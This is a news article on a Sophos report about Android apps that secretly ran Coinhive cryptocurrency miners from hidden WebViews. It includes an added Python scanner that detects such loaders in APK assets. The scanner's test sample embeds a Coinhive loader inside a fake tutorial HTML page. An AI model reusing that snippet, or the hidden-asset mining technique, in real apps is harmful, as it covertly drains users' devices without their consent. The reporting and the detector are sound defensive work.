This article is based on a 13-page report published last week by UK cyber-security firm Sophos. According to the company, its engineers found 19 Android applications that were uploaded to, and made available through, the official Google Play Store.
Sophos says these apps were silently loading an instance of the Coinhive script from an external source without the user's knowledge.
A review of the malicious apps revealed that the authors, believed to be the same person or group, hid the Coinhive JavaScript mining code inside HTML files in the apps' /assets folder.
The malicious code executed when the user started the apps and the apps opened a WebView browser instance.
In some cases, where the app had no reason to open a browser window, the WebView element was hidden from view and the mining code ran in the background.
In other cases, where the app was a news reader or tutorial viewer, the Coinhive in-browser JavaScript mining code ran alongside the app's legitimate content while the user was using the app.
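As an added illustration, not from the Sophos report, here is a defender-side check for the pattern described above: unpack an APK (a zip archive) and scan the HTML and JavaScript files under /assets for the Coinhive loader. The Coinhive script URL and constructor name are the public Coinhive browser API; the sample APK, its file names and the site-key placeholder are constructed for the example.

```python
import io
import re
import zipfile

# Indicators of an embedded Coinhive loader. The script URL and constructor
# name are the public Coinhive API; ".start(" alone is too generic to flag.
COINHIVE_PATTERNS = {
    "script_url": re.compile(r"coinhive\.com/lib/coinhive(\.min)?\.js", re.I),
    "constructor": re.compile(r"CoinHive\.(Anonymous|User|Token)\s*\(", re.I),
    "start_call": re.compile(r"\.start\s*\(", re.I),
}
ASSET_EXTS = (".html", ".htm", ".js")


def scan_apk_assets(apk_bytes: bytes) -> list:
    """Scan the assets/ folder of an APK for Coinhive loader code.
    Returns one finding per matching asset, listing the indicators it hit."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            if not name.startswith("assets/") or not name.lower().endswith(ASSET_EXTS):
                continue
            text = apk.read(name).decode("utf-8", errors="ignore")
            hits = [k for k, pat in COINHIVE_PATTERNS.items() if pat.search(text)]
            # Require the loader URL or the constructor to avoid false positives.
            if "script_url" in hits or "constructor" in hits:
                findings.append({"asset": name, "indicators": hits})
    return findings


def build_sample_apk() -> bytes:
    """Construct a minimal APK-like zip (sample data, not a real app) with one
    tutorial page that hides a miner and one clean page."""
    miner_html = (
        "<html><body><h1>Wrestling moves</h1>"
        '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        "<script>var m=new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');m.start();</script>"
        "</body></html>"
    )
    clean_html = "<html><body><p>Tutorial step 1</p></body></html>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("assets/tutorial/index.html", miner_html)
        z.writestr("assets/about.html", clean_html)
        z.writestr("res/layout/main.xml", "<LinearLayout/>")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_apk_assets(build_sample_apk()):
        print(f"{f['asset']}: {', '.join(f['indicators'])}")
```

The same scan runs unchanged against a real APK read from disk, since an APK is an ordinary zip archive.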
Sophos found this technique in 19 apps distributed via four developer accounts. Most apps barely reached 100-500 installs, but one app, extreme.action.wwe.wrestin, was installed on between 100,000 and 500,000 devices.
The apps were uploaded to the Play Store around Christmas, and Sophos researchers reported all of them to Google. All have been removed from the official Play Store at the time of writing.
A list of all 19 Coinhive-laden apps is available on page 7 of the Sophos report, and users can review the list to see if they installed any of the apps on their devices.
On page 10, there is another list of malicious apps, but these did not load the Coinhive JavaScript miner; instead they bundled the native cpuminer library for mining Bitcoin and Litecoin.
Sophos dubbed this malware CoinMiner and says it found it embedded in 10 apps made available through the coandroid.ru website, a third-party Android app store.